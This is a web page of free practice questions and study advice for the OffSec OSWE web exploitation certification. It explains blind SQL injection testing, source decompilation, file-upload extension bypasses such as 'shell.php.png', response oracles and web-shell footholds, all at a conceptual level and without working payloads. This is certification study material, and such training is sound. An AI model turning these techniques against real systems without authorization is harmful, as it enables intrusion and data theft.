200+ Free OSWE Practice Questions

Pass your OSWE OffSec Web Expert (WEB-300) exam on the first try — instant access, no signup required.

✓ No registration✓ No credit card✓ No hidden fees✓ Start practicing immediately

200+ Questions

100% Free

1 / 200

Question 1

Score: 0/0

When reproducing a suspected blind SQL injection in a login workflow, which Burp Suite tool is usually best for sending one request at a time while changing a single parameter and watching the response?

Intruder

Repeater

Sequencer

Comparer

to track

2026 Statistics

Key Facts: OSWE Exam

Scored Objectives

OffSec exam guide

85/100

Passing Score

OffSec exam guide

47h 45m

Exam Time

OffSec exam guide

24 hours

Report Upload Window

OffSec FAQ / proctoring article

Syllabus Modules

OffSec WEB-300 page

Challenge Labs

OffSec WEB-300 page

As of March 11, 2026, OffSec's OSWE exam remains a 47-hour-45-minute practical with 4 objectives worth 25 points each and an 85/100 passing score. Candidates then have 24 hours to upload their report. OffSec currently allows notes and online resources during the open-book exam, but the FAQ explicitly excludes AI chatbots and LLMs with direct prompt access.

Sample OSWE Practice Questions

Try these sample questions to test your OSWE exam readiness. Each question includes a detailed explanation. Start the interactive quiz above for the full 200+ question experience with AI tutoring.

1When reproducing a suspected blind SQL injection in a login workflow, which Burp Suite tool is usually best for sending one request at a time while changing a single parameter and watching the response?

A.Intruder

B.Repeater

C.Sequencer

D.Comparer

Explanation: Burp Repeater is built for manual request-by-request testing. In OSWE-style work, you often need to tweak one payload, resend it, and compare tiny response changes without the automation overhead of Intruder.

2A request only becomes exploitable after the application sets a CSRF token in a hidden form field. What should you capture first in Burp before sending crafted payloads to Repeater?

A.The target's TLS certificate

B.A fresh valid request flow that includes the current token

C.Only the final POST body

D.A screenshot of the rendered page

Explanation: Many OSWE attack chains fail because candidates replay stale state. Capturing a fresh baseline request with the current token, cookies, and headers lets you isolate whether the exploit failed because of business logic or because the session state was invalid.

3You obtain a deployed ASP.NET application and need to inspect server-side logic quickly. Which approach is most aligned with WEB-300 methodology?

A.Read only the HTML source in the browser

B.Recover the managed assemblies and decompile them

C.Assume the routes match the UI labels

D.Use only directory brute forcing and skip code review

Explanation: WEB-300 explicitly emphasizes source recovery and managed .NET code analysis. Decompiling the assemblies gives you controller logic, validation rules, and hidden code paths that are invisible from the browser alone.

4A Java web application ships as a WAR file with many `.class` files but no source. What is the most useful next step for white-box review?

A.Convert the classes to images and inspect metadata

B.Decompile the Java classes and trace the request mappings

C.Delete the WEB-INF directory to force verbose errors

D.Focus only on robots.txt and sitemap.xml

Explanation: Decompilation is the practical way to recover Java application logic when source is missing. Once you recover the code, tracing servlet mappings and controller methods often reveals hidden parameters, auth checks, and sinks for injection or RCE.

5Why is remote debugging valuable when a suspected code path is complex and controlled by multiple conditions?

A.It guarantees a public exploit exists

B.It lets you observe real variable values and execution flow instead of guessing

C.It automatically patches the vulnerability

D.It replaces the need for HTTP testing

Explanation: Remote debugging turns assumptions into evidence. In OSWE-style challenges, seeing which branch executes, what object values are created, and where sanitization actually fails is often the difference between a near miss and a working exploit.

6A password reset flow reveals whether a user exists by returning different HTML lengths for valid and invalid accounts. What is the main attacker advantage?

A.It enables direct shell access

B.It creates an oracle that can guide account enumeration and follow-on attacks

C.It disables CSRF protection

D.It forces the server to expose source code

Explanation: A response-difference oracle is extremely useful in advanced web exploitation. Even if the server never prints sensitive data directly, predictable differences can let an attacker confirm usernames, valid tokens, or successful boolean conditions.

7In boolean-based blind SQL injection, why do testers often compare full response bodies rather than relying only on the HTTP status code?

A.Status codes are never returned for SQL queries

B.The application may always return the same status while the page content changes subtly

C.HTTP status codes are encrypted

D.Burp Repeater cannot show status codes

Explanation: Many blind SQLi targets always answer with `200 OK`, so the useful signal lives in the content, length, or redirect target. OSWE-style testing often depends on spotting tiny but repeatable differences in the rendered response.

8A file upload filter blocks `.php` files but accepts image uploads. Which server-side mistake most commonly makes a bypass possible?

A.Using TLS 1.2

B.Validating only client-supplied metadata such as filename or MIME type

C.Hashing the file after upload

D.Storing files outside the web root

Explanation: Client-supplied filename and MIME type fields are easy to spoof. Real security depends on server-side content handling, storage location, execution policy, and strict extension validation after normalization.

9An upload handler strips one dangerous extension but then saves the original basename plus the remaining suffix. Which filename is most likely to succeed if the handler only removes the first occurrence of `.php`?

A.avatar.png

B.shell.php.png

C.shellphp.png

D.shell.txt

Explanation: Weak normalization logic often creates extension bypasses because it transforms the attacker input rather than validating the final canonical result. If only the first dangerous fragment is stripped, the resulting saved filename may still end with an executable extension or pass a later misparse.

10After obtaining code execution in a restricted web shell, you need a more stable foothold. What information is usually most valuable to gather first?

A.The developer's LinkedIn profile

B.Writable directories and the application's real web root

C.The browser window size

D.The server's favicon hash

Explanation: Stability matters more than novelty. Knowing where you can write and what the application treats as the real web root lets you turn a fragile foothold into a reliable payload path, which is common in OSWE file-upload and RCE chains.

About the OSWE Exam

OSWE is OffSec's advanced web exploitation certification tied to WEB-300: Advanced Web Attacks and Exploitation. The exam is a long-form, open-book, remotely proctored practical that expects candidates to analyze source code, chain complex web vulnerabilities, develop reliable exploits, retrieve proof, and submit a professional report.

Assessment

4 hands-on objectives worth 25 points each, plus required report submission

Time Limit

47h 45m exam + 24h report upload window

Passing Score

85/100

Exam Fee

$1,749 Course + Cert Bundle or $2,749/year Learn One (OffSec)

OSWE Exam Content Outline

~18%

Tooling, Source Recovery, and Debugging

Burp workflow, Python interaction, source-code recovery, routing analysis, IDE use, and remote debugging. OffSec does not publish official percentages; this weighting is inferred from the current WEB-300 syllabus.

~18%

Authentication Bypass and Logic Flaws

Broken reset flows, weak token generation, session abuse, CORS/CSRF chaining, insecure defaults, and application logic mistakes.

~20%

Injection and Data Exfiltration

Blind SQL injection, SQLi-assisted account takeover, data extraction, file-upload bypass, command injection, and database-to-RCE thinking.

~16%

Deserialization, Type Confusion, and SSTI

PHP loose comparison, magic hashes, .NET deserialization, object-graph abuse, template injection discovery, and filter evasion.

~14%

XXE, SSRF, and Server-Side Chaining

XML parser abuse, blind SSRF enumeration, API discovery, microservice pivoting, and internal-service exploitation.

~9%

Client-Side and JavaScript Attack Chains

Persistent or DOM-based XSS, JavaScript source analysis, WebSocket abuse, prototype pollution, and template-engine RCE paths.

~5%

Custom Exploitation and Reporting

Choosing stable exploit paths, writing reproducible proof-of-concept code, collecting evidence, and documenting every objective clearly.

How to Pass the OSWE Exam

What You Need to Know

Passing score: 85/100
Assessment: 4 hands-on objectives worth 25 points each, plus required report submission
Time limit: 47h 45m exam + 24h report upload window
Exam fee: $1,749 Course + Cert Bundle or $2,749/year Learn One

Keys to Passing

Complete 500+ practice questions
Score 80%+ consistently before scheduling
Focus on highest-weighted sections
Use our AI tutor for tough concepts

OSWE Study Tips from Top Performers

1Treat source-code review as a primary skill, not a backup plan. OSWE expects you to read unfamiliar code fast and map routes, data flow, and trust boundaries.

2Build repeatable blind-SQLi workflows for boolean checks, response-diffing, timing, and controlled data extraction instead of memorizing one payload shape.

3Practice finding exploit chains, not isolated bugs. The exam rewards candidates who can turn a logic flaw, parser weakness, or internal service exposure into reliable access.

4Get comfortable debugging .NET, Java, JavaScript, and templating behavior so you can verify assumptions instead of guessing about object state or render paths.

5Rehearse SSRF, XXE, and internal API abuse with a systematic enumeration method so blind server-side bugs turn into actionable targets quickly.

6Write concise proof-of-concept scripts and clean notes while you work. The report window is short, and poor documentation can waste points you already earned.

7Plan your reporting format before exam day. Screenshots, request/response evidence, reproduction steps, and proof-file handling should be routine by then.

Frequently Asked Questions

What is the OSWE exam format?

OffSec's current OSWE exam guide states that WEB-300 candidates have 47 hours and 45 minutes to complete the exam and that the exam contains 4 objectives worth 25 points each. The guide also states that you must score 85 points to pass. After the practical ends, OffSec gives you another 24 hours to upload your report.

How many questions are on the OSWE exam?

OSWE is not a multiple-choice exam. OffSec currently describes it as a hands-on practical with 4 scored objectives rather than a bank of conventional questions. This practice set provides 200 multiple-choice items to help you rehearse the knowledge and reasoning behind the live exam.

Does OffSec publish official OSWE domain percentages?

As of March 11, 2026, I did not find official percentage weightings for OSWE on OffSec's current WEB-300 course page, syllabus, exam guide, or FAQ. The content sections on this page are therefore inferred from the published WEB-300 syllabus topics and the exam objectives OffSec does describe publicly.

Is OSWE open book, and can I use AI during the exam?

The current OSWE FAQ says the exam is open book and that you may use your notes, online resources, and the OffSec Learning Platform. The same FAQ also explicitly excludes AI chatbots and LLMs with direct prompt access, so you should treat interactive AI assistance as off-limits during the active exam.

How much does the OSWE exam cost in 2026?

The current public WEB-300 page shows pricing starting at $1,749 for the Course + Cert Bundle, while OffSec's current products page lists Learn One at $2,749 per year. OffSec's OSWE pages do not currently show a separate public OSWE standalone-exam listing similar to OSCP+, so the most visible public purchase paths are the training bundle and Learn One subscription.

What changed for OSWE in 2026?

As of March 11, 2026, I did not find a new OSWE-specific overhaul notice comparable to OffSec's separate OSCP+ change announcements. The current official OSWE materials still describe WEB-300/OSWE as a 48-hour-class practical path, and the most relevant current policy language is the FAQ's explicit ban on AI chatbots and direct-prompt LLM use during the open-book exam.